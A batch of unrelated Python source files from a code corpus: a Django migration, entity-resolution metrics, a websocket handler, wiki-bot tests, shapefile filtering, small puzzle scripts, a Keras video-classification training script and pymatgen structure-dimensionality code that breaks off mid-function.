('name', models.CharField(max_length=30)),
('description', models.TextField()),
('subject', models.CharField(max_length=4)),
('course_number', models.CharField(max_length=4)),
],
),
migrations.CreateModel(
name='Tutor',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_name', models.CharField(max_length=300)),
('last_name', models.CharField(max_length=300)),
('picture', models.URLField()),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.RemoveField(
model_name='student',
name='email',
),
migrations.AlterField(
model_name='student',
name='bio',
field=models.TextField(blank=True, max_length=200),
),
migrations.CreateModel(
name='tutorRequest',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('description', models.TextField()),
('course', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='study.Course')),
('student', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='study.Student')),
('tutor', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='study.Tutor')),
],
),
]
|
StarcoderdataPython
|
29804
|
<gh_stars>10-100
import csv
import json
def pair_entity_ratio(found_pair_set_len, entity_count):
return found_pair_set_len / entity_count
def precision_and_recall(found_pair_set, pos_pair_set, neg_pair_set=None):
# if a neg_pair_set is provided,
# consider the "universe" to be only the what's inside pos_pair_set and neg_pair_set,
# because this means a previous blocking was applied
if neg_pair_set is not None:
found_pair_set = found_pair_set & (pos_pair_set | neg_pair_set)
true_positives = found_pair_set & pos_pair_set
false_positives = found_pair_set - pos_pair_set
if true_positives:
precision = len(true_positives) / (len(true_positives) + len(false_positives))
else:
precision = 0.0
recall = len(true_positives) / len(pos_pair_set)
return precision, recall
def f1_score(precision, recall):
if precision or recall:
return (2 * precision * recall) / (precision + recall)
else:
return 0.0
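# Worked example (not in the original module): with
#     found_pair_set = {(1, 2), (3, 4)} and pos_pair_set = {(1, 2), (5, 6)}
# precision_and_recall() gives precision = 0.5 and recall = 0.5, so
# f1_score(0.5, 0.5) == 0.5.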
def evaluate_output_json(
unlabeled_csv_filepath, output_json_filepath, pos_pair_json_filepath, csv_encoding="utf-8"
):
with open(
unlabeled_csv_filepath, "r", newline="", encoding=csv_encoding
) as record_dict_csv_file:
record_count = sum(1 for __ in csv.DictReader(record_dict_csv_file))
with open(output_json_filepath, "r") as f:
found_pair_set = json.load(f)
found_pair_set = set(tuple(t) for t in found_pair_set)
with open(pos_pair_json_filepath, "r") as f:
pos_pair_set = json.load(f)
pos_pair_set = set(tuple(t) for t in pos_pair_set)
precision, recall = precision_and_recall(found_pair_set, pos_pair_set)
return (
precision,
recall,
f1_score(precision, recall),
pair_entity_ratio(len(found_pair_set), record_count),
)
|
StarcoderdataPython
|
180070
|
from geventwebsocket.handler import WebSocketHandler
class DjangoWebSocketHandler(WebSocketHandler):
def run_websocket(self):
"""
        Just run the websocket request on the application. Don't use client
tracking because we are using unix domain sockets and the client addr
is the same for every socket.
"""
try:
self.application(self.environ, lambda s, h, e=None: [])
finally:
# not sure all this tidy up is necessary
self.environ.update({'wsgi.websocket': None})
if not self.websocket.closed:
self.websocket.close()
self.websocket = None
@property
def active_client(self):
"""
Since we are tracking clients return None here.
"""
return
|
StarcoderdataPython
|
71834
|
# -*- coding: utf-8 -*-
"""Tests for the redirect.py script."""
#
# (C) Pywikibot team, 2017
#
# Distributed under the terms of the MIT license.
#
from __future__ import absolute_import, unicode_literals
try:
from unittest.mock import Mock, patch
except ImportError:
from mock import Mock, patch
import pywikibot
from pywikibot import site, Page, i18n
from scripts.redirect import RedirectRobot
from tests.aspects import DefaultSiteTestCase
# To make `self.site.logged_in(sysop=True)` always return False
@patch.object(site.APISite, 'logged_in', new=Mock(return_value=False))
@patch.object(Page, 'exists', new=Mock(return_value=True))
class TestGetSDTemplateNoSysop(DefaultSiteTestCase):
"""Test the get_sd_template method of the RedirectRobot class."""
def test_with_delete_and_existing_sdtemplate(self):
"""Test with delete and existing sdtemplate."""
options = {'delete': True, 'sdtemplate': '{{t}}'}
bot = RedirectRobot('broken', **options)
self.assertEqual(bot.sdtemplate, '{{t}}')
@patch.object(i18n, 'twhas_key', new=Mock(return_value=True))
@patch.object(i18n, 'twtranslate', new=Mock(return_value='{{sd_title}}'))
def test_with_delete_and_i18n_sd(self):
"""Test with delete and i18n template."""
bot = RedirectRobot('broken', delete=True)
self.assertEqual(bot.sdtemplate, '{{sd_title}}')
@patch.object(i18n, 'twhas_key', new=Mock(return_value=False))
def test_with_delete_no_sd_no_i18n(self):
"""Test with delete and no i18n template."""
with patch.object(pywikibot, 'warning') as w:
bot = RedirectRobot('broken', delete=True)
w.assert_called_with('No speedy deletion template available.')
self.assertEqual(bot.sdtemplate, None)
def test_with_delete_and_non_existing_sdtemplate(self):
"""Test with delete and non-exisitng sdtemplate."""
options = {'delete': True, 'sdtemplate': 'txt {{n|a}} txt'}
with patch.object(Page, 'exists', new=Mock(return_value=False)):
with patch.object(pywikibot, 'warning') as w:
bot = RedirectRobot('broken', **options)
w.assert_called_with('No speedy deletion template "n" available.')
self.assertEqual(bot.sdtemplate, None)
|
StarcoderdataPython
|
1640086
|
<reponame>deniskolokol/anywhere
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from osgeo import ogr
def filter_file(filter_func, infile, outfile):
"""
Saves all infile shapes which pass through filter_func to outfile.
Example:
filter_file(lambda x: x.GetField('ISO2') == 'CZ', 'TM_WORLD_BORDERS-0.3.shp', 'cz.shp')
"""
driver = ogr.GetDriverByName('ESRI Shapefile')
inDS = driver.Open(infile)
inLayer = inDS.GetLayer()
outDS = driver.CreateDataSource(outfile)
outLayer = outDS.CreateLayer('filtered')
feat = inLayer.GetFeature(0) # first feature
for field in feat.keys():
outLayer.CreateField(feat.GetFieldDefnRef(field))
del feat
featureDefn = outLayer.GetLayerDefn()
for i in range(inLayer.GetFeatureCount()):
feat = inLayer.GetFeature(i)
if not filter_func(feat):
continue
outFeature = ogr.Feature(featureDefn)
outFeature.SetGeometry(feat.GetGeometryRef())
for field in feat.keys():
outFeature.SetField(field, feat.GetField(field))
outLayer.CreateFeature(outFeature)
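    # Dereference the data sources so OGR flushes the new layer to disk
    # (added here; relies on the usual osgeo.ogr behaviour where features are
    # only guaranteed to be written once the DataSource is released).
    del inDS, outDS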
|
StarcoderdataPython
|
64685
|
import platform
import os
import logging.handlers
from lbrynet import build_type, __version__ as lbrynet_version
log = logging.getLogger(__name__)
def get_platform() -> dict:
p = {
"processor": platform.processor(),
"python_version": platform.python_version(),
"platform": platform.platform(),
"os_release": platform.release(),
"os_system": platform.system(),
"lbrynet_version": lbrynet_version,
"build": build_type.BUILD, # CI server sets this during build step
}
if p["os_system"] == "Linux":
import distro
p["distro"] = distro.info()
p["desktop"] = os.environ.get('XDG_CURRENT_DESKTOP', 'Unknown')
return p
|
StarcoderdataPython
|
3376507
|
<filename>loops.py
largest = None
smallest = None
val=None
while True:
    num = raw_input('Enter a number :')
    if num == "done" : break
    try:
        val = int(num)
    except:
        print "Invalid input"
        continue
    if largest is None or val > largest :
        largest = val
    if smallest is None or val < smallest :
        smallest = val
print "Maximum is", largest
print "Minimum is", smallest
|
StarcoderdataPython
|
1700577
|
<filename>day04/part1.py
import re
def test_num(num):
str_num = str(num)
if re.search("(1{2}|2{2}|3{2}|4{2}|5{2}|6{2}|7{2}|8{2}|9{2}|0{2})", str_num) == None:
return False
return list(str_num) == sorted(str_num)
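# For example (annotation, not in the original): test_num(113579) is True
# (adjacent pair "11" and non-decreasing digits), while test_num(123789) is
# False (no adjacent pair) and test_num(221111) is False (digits decrease).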
def process(start, end):
count = 0
for num in range(start, end + 1):
if test_num(num):
print(f'Num passed {num}')
count += 1
print(f'Valid password count {count}')
return count
def main():
process(235741, 706948)
if __name__ == "__main__":
main()
|
StarcoderdataPython
|
78656
|
#!/usr/bin/env python3.7
class Proposal:
"""
Sequence proposed by the player while trying to guess the secret
The problem will add hint information, by setting the value of whites and reds
"""
"""proposed secret sequence"""
sequence = str
"""number of right colours in a wrong position"""
whites = int
"""number of right colours in the correct position"""
reds = int
def __init__(self, sequence):
"""
Create a proposal
:param sequence: secret sequence proposed by the player
"""
self.sequence = sequence
|
StarcoderdataPython
|
1665931
|
"""
********************************
* Created by mohammed-alaa *
********************************
Here I'm training a video-level network based on recurrent networks (per-frame CNN features are stacked into a 3d tensor and fed to an RNN):
1. setting configs (with spatial+motion concatenation the feature size is 4096 = 2048 * 2)
2. generating experiment_identifier and creating files
3. downloading pickled data from drive; each pickled file is a big numpy array whose shape is [instances, samples per video, features (2048 or 4096)]
"""
import glob
import pickle
import random
import shutil
from tensorflow.keras import backend as K
from tensorflow.python.keras import Model
from tensorflow.python.keras.layers import Dense, Softmax, GRU
import utils.training_utils as eval_globals
from evaluation.evaluation import *
from utils import log
from utils.drive_manager import DriveManager
################################################################################
"""Configs"""
lr = 1e-6
hidden_state = 128
feature_field = 2048
testing_samples_per_video = 19
epochs = 1000
save_every = 25
batch_size = 64
num_training_samples = 9537
num_testing_samples = 3783
is_spatial = True
is_motion = True
if is_spatial and is_motion:
feature_field *= 2
################################################################################
"""Files, paths & identifier"""
suffix = "" # put your name or anything :D
experiment_identifier = suffix + "recurrent_fusion_selu_atten_simple" + str(lr)
################
log_file = experiment_identifier + ".log"
log_stream = open(log_file, "a")
checkpoint_dir = "./fusion/"
checkpoints = checkpoint_dir + "fusion_chk"
try:
shutil.rmtree(checkpoint_dir)
except:
pass
drive_manager = DriveManager(experiment_identifier)
checkpoint_found, zip_file_name = drive_manager.get_latest_snapshot()
################################################################################
"""sanity check"""
if not is_motion and not is_spatial:
exit()
################################################################################
"""Downloads the files and makes sure files aren't re-downloaded with every run if no one is missed"""
if is_spatial:
drive_manager_spatial = DriveManager("spatial_feature_dataset")
test_spatial = drive_manager_spatial.search_file("test_features_spatial.pickle")
train_spatial = drive_manager_spatial.search_file("train_features_spatial.pickle")
if len(test_spatial) == 0:
print("Please run 'generate_spatial_feature_dataset.py' and generate 'test_features_spatial.pickle'..this file will be saved to your drive in '<YOUR FOLDER:{}>/spatial_feature_dataset'".format(drive_manager_spatial.personal_dfolder))
exit()
if len(train_spatial) == 0:
print("Please run 'generate_spatial_feature_dataset.py' and generate 'train_features_spatial.pickle'..those files will be saved to your drive in '<YOUR FOLDER:{}>/spatial_feature_dataset'".format(drive_manager_spatial.personal_dfolder))
exit()
drive_manager_spatial.download_file(test_spatial[0]["id"], "test_features_spatial.pickle", unzip=False)
if len(glob.glob("train_features_spatial.pickle*")) != len(train_spatial):
drive_manager_spatial.download_files_list(train_spatial, False, False)
if is_motion:
drive_manager_motion = DriveManager("motion_feature_dataset")
    test_motion = drive_manager_motion.search_file("test_features_motion.pickle")
train_motion = drive_manager_motion.search_file("train_features_motion.pickle")
if len(test_motion) == 0:
print("Please run 'generate_motion_feature_dataset.py' and generate 'test_features_motion.pickle'..this file will be saved to your drive in '<YOUR FOLDER:{}>/motion_feature_dataset'".format(drive_manager_motion.personal_dfolder))
exit()
if len(train_motion) == 0:
print("Please run 'generate_motion_feature_dataset.py' and generate 'train_features_motion.pickle'..those files will be saved to your drive in '<YOUR FOLDER:{}>/motion_feature_dataset'".format(drive_manager_motion.personal_dfolder))
exit()
drive_manager_motion.download_file(test_motion[0]["id"], "test_features_motion.pickle", unzip=False)
if len(glob.glob("train_features_motion.pickle*")) != len(train_motion):
drive_manager_motion.download_files_list(train_motion, False, False)
################################################################################
seen_spatial_files = set()
seen_motion_files = set()
def train_generator():
while True:
train_samples_spatial, train_labels_spatial, train_samples_motion, train_labels_motion = [0] * 4
"""Choose file to read while being downloaded then read files"""
"""load spatial data"""
if is_spatial:
spatial_features_files = glob.glob("train_features_spatial.pickle*")
if len(spatial_features_files) == len(seen_spatial_files):
seen_spatial_files.clear()
while True:
spatial_features_file = random.sample(spatial_features_files, k=1)[0]
if spatial_features_file not in seen_spatial_files:
try:
with open(spatial_features_file, 'rb') as f:
train_samples_spatial, train_labels_spatial = pickle.load(f)
# print("chose:", spatial_features_file)
seen_spatial_files.add(spatial_features_file)
break
except:
pass
"""load motion data"""
if is_motion:
motion_features_files = glob.glob("train_features_motion.pickle*")
if len(motion_features_files) == len(seen_motion_files):
seen_motion_files.clear()
while True:
motion_features_file = random.sample(motion_features_files, k=1)[0]
if motion_features_file not in seen_motion_files:
try:
with open(motion_features_file, 'rb') as f:
train_samples_motion, train_labels_motion = pickle.load(f)
# print("chose:", motion_features_file)
seen_motion_files.add(motion_features_file)
break
except:
pass
"""generation loop"""
permutation = list(range((num_training_samples + batch_size - 1) // batch_size))
random.shuffle(permutation)
if is_spatial != is_motion: # xor
# single stream motion or spatial
if is_spatial:
train_samples, train_labels = train_samples_spatial, train_labels_spatial
assert train_samples_spatial.shape[0] == num_training_samples
else:
train_samples, train_labels = train_samples_motion, train_labels_motion
assert train_samples_motion.shape[0] == num_training_samples
for batch_index in permutation:
yield train_samples[batch_index * batch_size:(batch_index + 1) * batch_size], train_labels[batch_index * batch_size:(batch_index + 1) * batch_size]
else:
# concatenate samples from motion and spatial
assert np.allclose(train_labels_spatial, train_labels_motion)
assert train_samples_spatial.shape[0] == num_training_samples
assert train_samples_motion.shape[0] == num_training_samples
for batch_index in permutation:
yield np.concatenate([train_samples_spatial[batch_index * batch_size:(batch_index + 1) * batch_size], train_samples_motion[batch_index * batch_size:(batch_index + 1) * batch_size]], axis=2), train_labels_spatial[batch_index * batch_size:(batch_index + 1) * batch_size]
def test_generator():
"""load spatial test data"""
if is_spatial:
with open("test_features_spatial.pickle", 'rb') as f:
test_samples_spatial, test_labels_spatial = pickle.load(f)
"""load motion test data"""
if is_motion:
with open("test_features_motion.pickle", 'rb') as f:
test_samples_motion, test_labels_motion = pickle.load(f)
while True:
if is_spatial != is_motion: # xor
# single stream motion or spatial
if is_spatial:
# noinspection PyUnboundLocalVariable
test_samples, test_labels = test_samples_spatial, test_labels_spatial
assert test_samples_spatial.shape[0] == num_testing_samples
else:
# noinspection PyUnboundLocalVariable
test_samples, test_labels = test_samples_motion, test_labels_motion
assert test_samples_motion.shape[0] == num_testing_samples
for batch_index in range((test_samples.shape[0] + batch_size - 1) // batch_size):
yield test_samples[batch_index * batch_size:(batch_index + 1) * batch_size], test_labels[batch_index * batch_size:(batch_index + 1) * batch_size]
else:
# concatenate samples from motion and spatial
assert np.allclose(test_labels_motion, test_labels_spatial)
assert test_samples_spatial.shape[0] == num_testing_samples
assert test_samples_motion.shape[0] == num_testing_samples
for batch_index in range((num_testing_samples + batch_size - 1) // batch_size):
yield np.concatenate([test_samples_spatial[batch_index * batch_size:(batch_index + 1) * batch_size], test_samples_motion[batch_index * batch_size:(batch_index + 1) * batch_size]], axis=2), test_labels_spatial[batch_index * batch_size:(batch_index + 1) * batch_size]
class saver_callback(tf.keras.callbacks.Callback):
"""
    save the checkpoint with the tensorflow saver, not h5py, since the model is written with the subclassing API rather than the functional API >> a functional implementation is left as a TODO
    also logs the model state and uploads the files
"""
def on_epoch_end(self, epoch, logs={}):
epoch_one_based = epoch + 1
if epoch_one_based % save_every == 0 and epoch_one_based > 0:
log("=" * 100 + "\n(Training:)Epoch", epoch_one_based, "prec@1", logs["acc_top_1"], "prec@5", logs["acc_top_5"], "loss", logs["loss"], file=log_stream)
log("(Validation:)Epoch", epoch_one_based, "prec@1", logs["val_acc_top_1"], "prec@5", logs["val_acc_top_5"], "loss", logs["val_loss"], file=log_stream)
if logs["val_acc_top_1"] > eval_globals.best_video_level_accuracy_1:
log("Epoch", epoch_one_based, "Established new baseline:", logs["val_acc_top_1"], file=log_stream)
eval_globals.best_video_level_accuracy_1 = logs["val_acc_top_1"]
# save the model and pickle
#
else:
log("Epoch", epoch_one_based, "Baseline:", eval_globals.best_video_level_accuracy_1, "but got:", logs["val_acc_top_1"], file=log_stream)
saver.save(tf.keras.backend.get_session(), checkpoints)
drive_manager.upload_project_files(
files_list=[log_file],
dir_list=[checkpoint_dir],
snapshot_name=str(epoch_one_based) + "-" + "{0:.5f}".format(eval_globals.best_video_level_accuracy_1) + "-" + "{0:.5f}".format(logs["val_acc_top_1"]))
class Model(tf.keras.Model):
def __init__(self):
super(Model, self).__init__()
self.gru_1 = GRU(hidden_state, return_sequences=True, input_shape=(testing_samples_per_video, feature_field), dropout=.5) # recurrent layer
# self.gru_2 = GRU(hidden_state, return_sequences=True)
self.attention_layer = Dense(1) # gets attention weight for time step
self.attention_normalizer = Softmax(axis=1) # normalizes the 3d tensor to give weight for each time step
self.FC_1 = Dense(hidden_state // 2, activation='selu')
# recurrent_fusion_model.add(BatchNormalization())
# self.FC_2 = Dense(hidden_state // 4, activation='selu')
# self.BN_1 = BatchNormalization()
self.classification_layer = Dense(num_actions, activation='softmax')
def call(self, input_visual_feature, training=None, mask=None):
internal = self.gru_1(input_visual_feature) # returns a sequence of vectors of dimension feature_field
# in self attention i will return_sequences of course
# internal = self.gru_2(internal) # returns a sequence of vectors of dimension feature_field
un_normalized_attention_weights = self.attention_layer(internal)
normalized_attention_weights = self.attention_normalizer(un_normalized_attention_weights) # normalize on timesteps dimension
internal = normalized_attention_weights * internal
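        # Shape note (annotation, not in the original): the GRU output is
        # (batch, timesteps, hidden_state); the attention layer maps it to
        # (batch, timesteps, 1) and the softmax normalizes over the timestep
        # axis, so the broadcasted product keeps (batch, timesteps,
        # hidden_state) and the K.sum over axis 1 below pools it into a single
        # (batch, hidden_state) attention vector.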
print(internal)
attention_vector = K.sum(internal, axis=1) # sum on timesteps
print(attention_vector)
# recurrent_fusion_model.add(Dense(hidden_state // 2, activation='relu'))
# recurrent_fusion_model.add(BatchNormalization())
internal = self.FC_1(attention_vector)
# internal = self.FC_2(internal)
final_output = self.classification_layer(internal)
return final_output
# create the model
recurrent_fusion_model = Model()
recurrent_fusion_model.compile(optimizer=keras.optimizers.Adam(lr=lr), loss=sparse_categorical_cross_entropy_loss, metrics=[acc_top_1, acc_top_5])
# build internal tensors
recurrent_fusion_model.fit(*next(train_generator()), batch_size=1, epochs=1, verbose=0)
# get tensorflow saver ready > will be used if a checkpoint found on drive
saver = tf.train.Saver(recurrent_fusion_model.variables)
if checkpoint_found:
# restore the model from the checkpoint
log("Model restored")
eval_globals.best_video_level_accuracy_1 = float(zip_file_name.split("-")[1])
log("Current Best", eval_globals.best_video_level_accuracy_1)
saver.restore(tf.keras.backend.get_session(), checkpoints) # use tensorflow saver
initial_epoch = int(zip_file_name.split("-")[0]) # get epoch number
else:
# init the model from scratch, it's already done
log("Starting from scratch")
# expected input data shape: (batch_size, timesteps, data_dim)
recurrent_fusion_model.summary()
initial_epoch = 0
# training
recurrent_fusion_model.fit_generator(train_generator(),
epochs=epochs, steps_per_epoch=(num_training_samples + batch_size - 1) // batch_size,
validation_data=test_generator(), validation_steps=(num_testing_samples + batch_size - 1) // batch_size,
callbacks=[saver_callback(), keras.callbacks.ReduceLROnPlateau(monitor='val_loss', patience=50, verbose=1, min_lr=lr / 10)],
initial_epoch=initial_epoch)
|
StarcoderdataPython
|
153063
|
"""
This module provides functions to get the dimensionality of a structure.
A number of different algorithms are implemented. These are based on the
following publications:
get_dimensionality_larsen:
- <NAME>, <NAME>, <NAME>, <NAME>. Definition of a
scoring parameter to identify low-dimensional materials components.
Phys. Rev. Materials 3, 034003 (2019).
get_dimensionality_cheon:
- <NAME>.; <NAME>.; <NAME>.; <NAME>.; Reed,
<NAME>. Data Mining for New Two- and One-Dimensional Weakly Bonded Solids
and Lattice-Commensurate Heterostructures. Nano Lett. 2017.
get_dimensionality_gorai:
- <NAME>., <NAME>. & <NAME>. Computational Identification of
Promising Thermoelectric Materials Among Known Quasi-2D Binary Compounds.
J. Mater. Chem. A 2, 4136 (2016).
"""
import copy
import itertools
from collections import defaultdict
import numpy as np
from networkx.readwrite import json_graph
from pymatgen.analysis.graphs import MoleculeGraph, StructureGraph
from pymatgen.analysis.local_env import JmolNN
from pymatgen.analysis.structure_analyzer import get_max_bond_lengths
from pymatgen.core.lattice import get_integer_index
from pymatgen.core.periodic_table import Specie
from pymatgen.core.structure import Structure, Molecule
from pymatgen.core.surface import SlabGenerator
from pymatgen.symmetry.analyzer import SpacegroupAnalyzer
__author__ = "<NAME>, <NAME>, <NAME>"
def get_dimensionality_larsen(bonded_structure):
"""
Gets the dimensionality of a bonded structure.
The dimensionality of the structure is the highest dimensionality of all
structure components. This method is very robust and can handle
many tricky structures, regardless of structure type or improper connections
due to periodic boundary conditions.
Requires a StructureGraph object as input. This can be generated using one
of the NearNeighbor classes. For example, using the CrystalNN class::
bonded_structure = CrystalNN().get_bonded_structure(structure)
Based on the modified breadth-first-search algorithm described in:
<NAME>, <NAME>, <NAME>, <NAME>. Definition of a
scoring parameter to identify low-dimensional materials components.
Phys. Rev. Materials 3, 034003 (2019).
Args:
bonded_structure (StructureGraph): A structure with bonds, represented
as a pymatgen structure graph. For example, generated using the
CrystalNN.get_bonded_structure() method.
Returns:
(int): The dimensionality of the structure.
"""
return max([c['dimensionality'] for c in
get_structure_components(bonded_structure)])
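# Minimal usage sketch (mirrors the docstring above; assumes pymatgen's
# CrystalNN and a structure file on disk, neither of which is part of this
# module):
#
#     from pymatgen.analysis.local_env import CrystalNN
#     structure = Structure.from_file("my_material.cif")
#     bonded_structure = CrystalNN().get_bonded_structure(structure)
#     get_dimensionality_larsen(bonded_structure)   # -> 0, 1, 2 or 3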
def get_structure_components(bonded_structure, inc_orientation=False,
inc_site_ids=False, inc_molecule_graph=False):
"""
Gets information on the components in a bonded structure.
Correctly determines the dimensionality of all structures, regardless of
structure type or improper connections due to periodic boundary conditions.
Requires a StructureGraph object as input. This can be generated using one
of the NearNeighbor classes. For example, using the CrystalNN class::
bonded_structure = CrystalNN().get_bonded_structure(structure)
Based on the modified breadth-first-search algorithm described in:
<NAME>, <NAME>, <NAME>, <NAME>. Definition of a
scoring parameter to identify low-dimensional materials components.
Phys. Rev. Materials 3, 034003 (2019).
Args:
bonded_structure (StructureGraph): A structure with bonds, represented
as a pymatgen structure graph. For example, generated using the
CrystalNN.get_bonded_structure() method.
inc_orientation (bool, optional): Whether to include the orientation
of the structure component. For surfaces, the miller index is given,
for one-dimensional structures, the direction of the chain is given.
inc_site_ids (bool, optional): Whether to include the site indices
of the sites in the structure component.
inc_molecule_graph (bool, optional): Whether to include MoleculeGraph
objects for zero-dimensional components.
Returns:
(list of dict): Information on the components in a structure as a list
of dictionaries with the keys:
- "structure_graph": A pymatgen StructureGraph object for the
component.
- "dimensionality": The dimensionality of the structure component as an
int.
- "orientation": If inc_orientation is `True`, the orientation of the
component as a tuple. E.g. (1, 1, 1)
- "site_ids": If inc_site_ids is `True`, the site indices of the
sites in the component as a tuple.
- "molecule_graph": If inc_molecule_graph is `True`, the site a
MoleculeGraph object for zero-dimensional components.
"""
import networkx as nx # optional dependency therefore not top level import
comp_graphs = (bonded_structure.graph.subgraph(c) for c in
nx.weakly_connected_components(bonded_structure.graph))
components = []
for graph in comp_graphs:
dimensionality, vertices = calculate_dimensionality_of_site(
bonded_structure, list(graph.nodes())[0], inc_vertices=True)
component = {'dimensionality': dimensionality}
if inc_orientation:
if dimensionality in [1, 2]:
vertices = np.array(vertices)
g = vertices.sum(axis=0) / vertices.shape[0]
# run singular value decomposition
_, _, vh = np.linalg.svd(vertices - g)
# get direction (first column is best fit line,
# 3rd column is unitary norm)
index = 2 if dimensionality == 2 else 0
orientation = get_integer_index(vh[index, :])
else:
orientation = None
component['orientation'] = orientation
if inc_site_ids:
component['site_ids'] = tuple(graph.nodes())
if inc_molecule_graph and dimensionality == 0:
component['molecule_graph'] = zero_d_graph_to_molecule_graph(
bonded_structure, graph)
component_structure = Structure.from_sites(
[bonded_structure.structure[n] for n in sorted(graph.nodes())])
sorted_graph = nx.convert_node_labels_to_integers(
graph, ordering="sorted")
component_graph = StructureGraph(
component_structure,
graph_data=json_graph.adjacency_data(sorted_graph))
component['structure_graph'] = component_graph
components.append(component)
return components
def calculate_dimensionality_of_site(bonded_structure, site_index,
inc_vertices=False):
"""
Calculates the dimensionality of the component containing the given site.
Implements directly the modified breadth-first-search algorithm described in
Algorithm 1 of:
<NAME>, <NAME>, <NAME>, <NAME>. Definition of a
scoring parameter to identify low-dimensional materials components.
Phys. Rev. Materials 3, 034003 (2019).
Args:
bonded_structure (StructureGraph): A structure with bonds, represented
as a pymatgen structure graph. For example, generated using the
CrystalNN.get_bonded_structure() method.
site_index (int): The index of a site in the component of interest.
inc_vertices (bool, optional): Whether to return the vertices (site
images) of the component.
Returns:
(int or tuple): If inc_vertices is False, the dimensionality of the
component will be returned as an int. If inc_vertices is true, the
function will return a tuple of (dimensionality, vertices), where
vertices is a list of tuples. E.g. [(0, 0, 0), (1, 1, 1)].
"""
def neighbours(comp_index):
return [(s.index, s.jimage) for s
in bonded_structure.get_connected_sites(comp_index)]
def rank(vertices):
if len(vertices) == 0:
return -1
if len(vertices) == 1:
return 0
vertices = np.array(list(vertices))
return np.linalg.matrix_rank(vertices[1:] - vertices[0])
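    # For example (annotation, not in the original): {(0, 0, 0)} has rank 0,
    # {(0, 0, 0), (1, 0, 0)} has rank 1 and {(0, 0, 0), (1, 0, 0), (0, 1, 0)}
    # has rank 2; the rank of the set of periodic images reached from a site
    # is taken as the dimensionality of its component.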
def rank_increase(seen, candidate):
rank0 = len(seen) - 1
rank1 = rank(seen.union({candidate}))
return rank1 > rank0
connected_sites = {i: neighbours(i) for i in
range(bonded_structure.structure.num_sites)}
seen_vertices = set()
seen_comp_vertices = defaultdict(set)
queue = [(site_index, (0, 0, 0))]
while len(queue) > 0:
comp_i, image_i = queue.pop(0)
if (comp_i, image_i) in seen_vertices:
continue
seen_vertices.add((comp_i, image_i))
if not rank_increase(seen_comp_vertices[comp_i], image_i):
continue
seen_comp_vertices[comp_i].add(image_i)
for comp_j, image_j in connected_sites[comp_i]:
image_j = tuple(np.add(image_j, image_i))
if (comp_j, image_j) in seen_vertices:
continue
if rank_increase(seen_comp_vertices[comp_j], image_j):
queue.append((comp_j, image_j))
if inc_vertices:
return (rank(seen_comp_vertices[site_index]),
list(seen_comp_vertices[site_index]))
return rank(seen_comp_vertices[site_index])
def zero_d_graph_to_molecule_graph(bonded_structure, graph):
"""
Converts a zero-dimensional networkx Graph object into a MoleculeGraph.
Implements a similar breadth-first search to that in
calculate_dimensionality_of_site().
Args:
bonded_structure (StructureGraph): A structure with bonds, represented
as a pymatgen structure graph. For example, generated using the
CrystalNN.get_bonded_structure() method.
graph (nx.Graph): A networkx `Graph` object for the component of
interest.
Returns:
(MoleculeGraph): A MoleculeGraph object of the component.
"""
import networkx as nx
seen_indices = []
sites = []
start_index = list(graph.nodes())[0]
queue = [(start_index, (0, 0, 0),
bonded_structure.structure[start_index])]
while len(queue) > 0:
comp_i, image_i, site_i = queue.pop(0)
if comp_i in [x[0] for x in seen_indices]:
raise ValueError("Graph component is not 0D")
seen_indices.append((comp_i, image_i))
sites.append(site_i)
for site_j in bonded_structure.get_connected_sites(
comp_i, jimage=image_i):
if ((site_j.index, site_j.jimage) not in seen_indices and
(site_j.index, site_j.jimage, site_j.site) not in queue):
queue.append((site_j.index, site_j.jimage, site_j.site))
    # sort the list of indices and the graph by index to keep them consistent
indices_ordering = np.argsort([x[0] for x in seen_indices])
sorted_sites = np.array(sites, dtype=object)[indices_ordering]
sorted_graph = nx.convert_node_labels_to_integers(graph, ordering="sorted")
mol = Molecule([s.specie for s in sorted_sites],
[s.coords for s in sorted_sites])
mol_graph = MoleculeGraph.with_edges(mol, nx.Graph(sorted_graph).edges())
return mol_graph
def get_dimensionality_cheon(structure_raw, tolerance=0.45,
ldict=JmolNN().el_radius, standardize=True, larger_cell=False):
"""
Algorithm for finding the dimensions of connected subunits in a structure.
This method finds the dimensionality of the material even when the material
is not layered along low-index planes, or does not have flat
layers/molecular wires.
Author: "<NAME>"
Email: "<EMAIL>"
See details at :
<NAME>.; <NAME>.; <NAME>.; <NAME>.; Reed,
<NAME>. Data Mining for New Two- and One-Dimensional Weakly Bonded Solids and
Lattice-Commensurate Heterostructures. Nano Lett. 2017.
Args:
structure_raw (Structure): A pymatgen Structure object.
tolerance (float): length in angstroms used in finding bonded atoms.
Two atoms are considered bonded if (radius of atom 1) + (radius of
atom 2) + (tolerance) < (distance between atoms 1 and 2). Default
value = 0.45, the value used by JMol and Cheon et al.
ldict (dict): dictionary of bond lengths used in finding bonded atoms.
Values from JMol are used as default
standardize: works with conventional standard structures if True. It is
recommended to keep this as True.
larger_cell: tests with 3x3x3 supercell instead of 2x2x2. Testing with
            2x2x2 supercell is faster but misclassifies rare interpenetrated 3D
structures. Testing with a larger cell circumvents this problem
Returns:
(str): dimension of the largest cluster as a string. If there are ions
or molecules it returns 'intercalated ion/molecule'
"""
if standardize:
structure = SpacegroupAnalyzer(structure_raw).get_conventional_standard_structure()
else:
structure = structure_raw
structure_save = copy.copy(structure_raw)
connected_list1 = find_connected_atoms(structure, tolerance=tolerance, ldict=ldict)
max1, min1, clusters1 = find_clusters(structure, connected_list1)
if larger_cell:
structure.make_supercell([[3, 0, 0], [0, 3, 0], [0, 0, 3]])
connected_list3 = find_connected_atoms(structure, tolerance=tolerance, ldict=ldict)
max3, min3, clusters3 = find_clusters(structure, connected_list3)
if min3 == min1:
if max3 == max1:
dim = '0D'
else:
dim = 'intercalated molecule'
else:
dim = np.log2(float(max3) / max1) / np.log2(3)
if dim == int(dim):
dim = str(int(dim)) + 'D'
else:
return None
else:
structure.make_supercell([[2, 0, 0], [0, 2, 0], [0, 0, 2]])
connected_list2 = find_connected_atoms(structure, tolerance=tolerance, ldict=ldict)
max2, min2, clusters2 = find_clusters(structure, connected_list2)
if min2 == 1:
dim = 'intercalated ion'
elif min2 == min1:
